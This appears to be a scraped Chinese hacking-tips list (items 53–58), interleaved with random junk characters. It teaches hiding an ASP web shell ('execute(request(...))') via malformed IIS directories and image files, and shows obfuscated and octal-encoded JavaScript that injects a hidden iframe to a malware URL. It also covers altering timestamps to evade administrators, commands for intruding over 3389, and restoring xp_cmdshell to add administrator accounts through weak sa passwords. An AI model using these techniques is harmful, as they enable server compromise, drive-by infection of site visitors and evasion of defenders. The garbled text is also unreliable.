8 S2 e! t+ y l4 c d: j+ |: s0 }3 M6 O3 _4 N$ M5 U
53、隐藏ASP后门的两种方法7 X% j9 } T3 S. n% A) D# H$ ?- c
1、建立非标准目录:mkdir images..\
2 p5 x a' M2 ~( r) f拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
7 h/ n" T1 y6 s. \通过web访问ASP木马:http://ip/images../news.asp?action=login
5 I1 r2 V$ W9 F& r" b如何删除非标准目录:rmdir images..\ /s
+ q/ x8 l3 \( H* y) F+ b! q0 x% S2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
) f3 P) s' W4 vmkdir programme.asp
F4 F8 V6 J3 m1 o* V新建1.txt文件内容:<!--#include file=”12.jpg”-->
3 c$ }1 X# f% Y# i; Z新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
! s# Q, V1 b/ U" P5 ~- iattrib +H +S programme.asp
! L8 w+ y. K1 T" f通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt7 q* k' }: r6 O# K
' I; o8 F4 `8 X' g
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
: Q' W7 K# y& N, I5 j: C8 r然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
1 j6 X1 S$ F% v1 b# F/ I& D/ y( u: g3 f/ s
55、JS隐蔽挂马
s' a" K, f `. Y# v1.3 e' P+ F8 J5 O- m5 x: Z
var tr4c3="<iframe src=ht";5 D! y; [' e, f- W& S1 v
tr4c3 = tr4c3+"tp:/";
1 `+ u: w, r" H. s+ Ztr4c3 = tr4c3+"/ww";
4 s2 s& C6 m8 V' n m- B; @tr4c3 = tr4c3+"w.tr4";
, e1 }! y# W# e( b% m6 @6 X7 k4 T4 ?tr4c3 = tr4c3+"c3.com/inc/m";, @) k3 `& w' v7 W/ v$ g
tr4c3 = tr4c3+"m.htm style="display:none"></i";, b7 T% h; k0 M( x2 M
tr4c3 =tr4c3+"frame>'";
( N) `8 o' g& j% }- R7 }document.write(tr4c3);
9 w9 {( @) K4 {) _# ~7 {3 i' e8 J避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。- F4 o* l5 [% y% E" m! z9 K6 E4 _
, F. m( q/ L+ f) e' g2.
/ Q$ {: {- }( N+ _转换进制,然后用EVAL执行。如3 p! p. r& j' X4 w; ]* J' t8 E2 P
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
6 x) g( c+ @. P9 P8 d不过这个有点显眼。
/ K$ z+ d8 k# l. j( x2 q( D. ]) _3.2 e9 [* `: f; Q
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');, j/ ]( l* m* V0 I2 H0 W+ d8 P
最后一点,别忘了把文件的时间也修改下。( l6 t* p8 X8 `: H
7 ?% ~" i8 f7 X* P
56.3389终端入侵常用DOS命令
* B) i2 Q" n& b7 Ztaskkill taskkill /PID 1248 /t
/ v3 `# I+ j8 O, _; |
/ k6 N7 G; m+ k/ f- Ptasklist 查进程
; d a, t+ X6 j% v5 y6 }, H/ Y8 y
- i* a' b; I$ o5 e/ o. E3 E/ ^cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限+ z ~* j' K# e6 X' P9 n% n+ D
iisreset /reboot8 h# }% a+ O; L9 d- ^
tsshutdn /reboot /delay:1 重起服务器
. H8 \, ]6 w- F2 j0 l F
# u. H! U5 R4 O: d. hlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,; j2 R) Z! {! |) n1 }8 ]5 o
% h: ~* {# m! T1 P; Rquery user 查看当前终端用户在线情况8 w: S$ ]0 C* d3 v
" t: ~* P" h; F1 ~# E' R6 f要显示有关所有会话使用的进程的信息,请键入:query process *
9 w) L$ ~) a+ T$ R! x3 c# p5 M$ K
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2. N1 O, D: s7 p1 G$ B5 z0 e5 r
( R- Q+ h+ U" X: m要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
: B- v( u/ W8 v( K5 y% u1 J3 L. e' W4 o
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM025 B1 p4 S0 q3 `
: T3 x E. T9 i
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
$ x) l6 y# H! x6 J4 [' V7 e" }+ |" j- ~
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
. q6 W, @# E+ J9 B! I; H
& T* [2 o Q/ |+ \0 _命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
I' [' Z6 }+ Q) ^! F4 L% n7 f5 s- C* {, X
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机3 P r0 x5 X+ C8 x9 D
$ P' t( N ~: r* u5 y% u) B
56、在地址栏或按Ctrl+O,输入:
: M) N/ Q0 p. ?* d6 zjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;, P0 [2 C0 b1 w8 |8 H; ]; s2 f
9 j; ?# U9 | l0 n源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。2 o2 N c$ c0 x
' a; j9 F$ n2 `" |0 C6 i* q
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,* X4 t- L7 p8 N) Q* Q4 c) E1 V
用net localgroup administrators是可以看到管理组下,加了$的用户的。
# }( X% }2 a, x
* e( R0 \5 Q$ d$ t( Y$ i58、 sa弱口令相关命令
0 |# y2 o1 J$ ~+ w# Y' i7 L% Y9 f) M7 d0 {9 O
一.更改sa口令方法:3 _( A6 s) Q+ R3 K+ M
用sql综合利用工具连接后,执行命令:9 R- Q( Y7 s+ k& O
exec sp_password NULL,'20001001','sa' e- W `9 F4 U. e3 U
(提示:慎用!)
3 O; Z2 I8 ^' g6 o- U$ P& Y/ j6 W9 v& K) U
二.简单修补sa弱口令.
2 ? G. Z: [' L' J, s; h8 y2 @+ a n! A/ @
方法1:查询分离器连接后执行:0 c! V: K3 n, q& @* A) b) O( r
if exists (select * from
# J1 } { X0 h+ Y* J. V3 wdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
2 g* v) Z. V$ {0 ROBJECTPROPERTY(id, N'IsExtendedProc') = 1)* u6 o. I6 p1 F! I( v& W
% U2 J! g# V/ E, s
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'8 ^8 d- C4 n3 f U6 x
" q) m' _) y1 f( n3 ~0 L q9 JGO! l. y% K6 e0 @( c1 w
- t( x: t, p6 m2 B" A' e然后按F5键命令执行完毕1 J; i/ B4 t' i9 u8 N
+ d5 S* z/ e1 ~方法2:查询分离器连接后
2 ?5 W) j7 v" |3 t8 d, L第一步执行:use master
& G9 Q- d3 \# y. ?: Z$ X/ @第二步执行:sp_dropextendedproc 'xp_cmdshell'+ I5 c) |& ]4 J- i9 s( ?
然后按F5键命令执行完毕% F6 e( L" |! A! {* U
. M z' i* J8 w0 x$ k. K9 I& z! L% y# d$ U5 T6 O7 ?
三.常见情况恢复执行xp_cmdshell.
4 r4 p) c B3 t0 Z7 v: `2 N6 @
" X6 R# S6 |& L6 _# a
0 q. g% `, [% H9 ?1 K2 p$ W5 `1 未能找到存储过程'master..xpcmdshell'./ c. A B, {7 t* F' l4 d
恢复方法:查询分离器连接后,. l1 u8 T% \' f
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
, K7 J3 R2 E+ }, d" o第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'+ f9 k9 H2 g; Q% J, V7 H4 ]- g. e" \) A
然后按F5键命令执行完毕. r7 h5 z' }4 [' }* i5 N; F' T
: S; @9 B5 g) i5 G% `7 g' C! O
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。). M+ c0 n% p G# Z; b# R
恢复方法:查询分离器连接后,
! P, {# Q+ b7 P# C( d第一步执行:sp_dropextendedproc "xp_cmdshell"8 R7 G2 H$ D( R. W5 Y
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( Q4 _4 S& S3 U7 Z然后按F5键命令执行完毕
- Y, s# z( r4 }1 f# E/ A( V# k; n9 E+ l6 e/ n) D
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)( d9 r0 b& s0 s0 {. g" U
恢复方法:查询分离器连接后,! ~$ l" Q* O9 M7 s( W
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'% i# l8 [5 x9 x* l# A
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 2 w' B) f2 ]4 O" f1 Z8 s, z: s
然后按F5键命令执行完毕$ v8 S* o* u& E( j5 l/ ~' v- J
( ?6 n, R, e6 u5 R四.终极方法.
) ^- [( U; j4 W8 ^如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
) } z0 R" a; {7 K5 b查询分离器连接后,& n V* \. v7 ?: W7 }% G8 ?6 V9 N
2000servser系统:
i2 O0 k/ G* b3 qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
: l! l8 {8 {" E2 g% k: O
G' _+ R* c. F) cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
+ i( m9 U, c3 R4 H- _ @
$ R8 k& E {1 C5 l2 l' p, fxp或2003server系统:/ [" t+ Y# x, i' z( |# R% X0 |6 z
/ N4 g. ~1 K; @7 U/ i$ b, h1 Z5 X; P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'3 [8 N3 v( k) a
( u; Y' Q- [2 F* u9 u4 [" m- a
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 B3 Y% a! Y. F) \! s
|